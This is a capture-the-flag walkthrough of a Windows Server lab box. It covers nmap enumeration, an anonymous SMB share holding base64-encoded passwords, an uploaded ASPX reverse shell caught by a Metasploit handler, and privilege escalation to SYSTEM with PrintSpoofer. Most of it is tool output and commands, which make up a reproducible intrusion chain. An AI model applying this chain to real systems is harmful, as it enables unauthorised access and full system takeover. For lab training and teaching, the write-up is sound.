First, we will begin with our usual nmap scan to see where we can start looking.
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 04:18 CET
Nmap scan report for 10.10.218.69
Host is up (0.093s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server?
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-12-21T03:13:52
|_Not valid after: 2022-06-22T03:13:52
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2021-12-22T03:20:37+00:00
|_ssl-date: 2021-12-22T03:21:15+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m42s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2021-12-22T03:20:37
|_ start_date: 2021-12-22T03:14:38
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT
| Workgroup: WORKGROUP
|_ System time: 2021-12-21T19:20:39-08:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.73 seconds
From this, we see the web application is running on Microsoft Server IIS, not too bad.
Another important thing, looks like samba is also running without authentication.
Looks like samba is running without authentication enabled and there's also an interesting share.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Now we just have to connect to it and see what's happening.
Password for [WORKGROUP\max]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 25 23:46:04 2020
.. D 0 Sat Jul 25 23:46:04 2020
passwords.txt A 98 Sat Jul 25 17:15:33 2020
7735807 blocks of size 4096. 4945463 blocks available
smb: \> cat passwords.txt
cat: command not found
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Looks like we are lucky, we got a encrypted passwords text file, so let's see what's in it.
User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Now that we have encoded passwords, we need to decrypt them. For that I used this website.
After decoding both, we are left with 2 users:
Scanning a little more, I didn't find anywhere to use these credentials, so I started digging a bit.
After another nmap scan, this time with the -p- flag, we find another http port 49663 with a directory same name as the share. This means we can easily upload a reverse shell and invoke it going to the page. So first, let's generate the reverse shell payload.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of aspx file: 1010404 bytes
Saved as: 1337.aspx
Perfect, so before uploading that to the SMB share we need to start a listener with metasploit.
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.1.8-dev ]
+ -- --=[ 2167 exploits - 1149 auxiliary - 397 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.8.208.63
LHOST => 10.8.208.63
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.208.63:1337
Now we can finally connect to the share, upload our payload and get the reverse shell in meterpreter navigating to the webpage.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.208.63:1337
[*] Meterpreter session 7 opened (10.8.208.63:1337 -> 10.10.232.253:49773) at 2021-12-22 05:24:46 +0100
meterpreter > whoami /priv
[-] Unknown command: whoami
meterpreter > shell
Process 2284 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
Looks like we are finally inside the server, now go grab the user flag at C:\Users\Bob\Desktop\user.txt and let's move to getting root.
So we are now inside the server with a user called iis apppool\defaultapppool.
Taking a closer look at the privileges we have, SeImpersonatePrivilege is kinda suspicious, and that's because there's a famous exploit called PrintSpoofer that abuses that privilege to escalate privileges.
First, let's get the exe from here and upload it to the SMB share again.
After that, we just navigate to the share directory inside our reverse shell and execute the file.
PrintSpoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>
Well, looks like that's it. Just go and grab the flag at C:\Users\Administrator\Desktop\root.txt.
Hope you enjoyed it!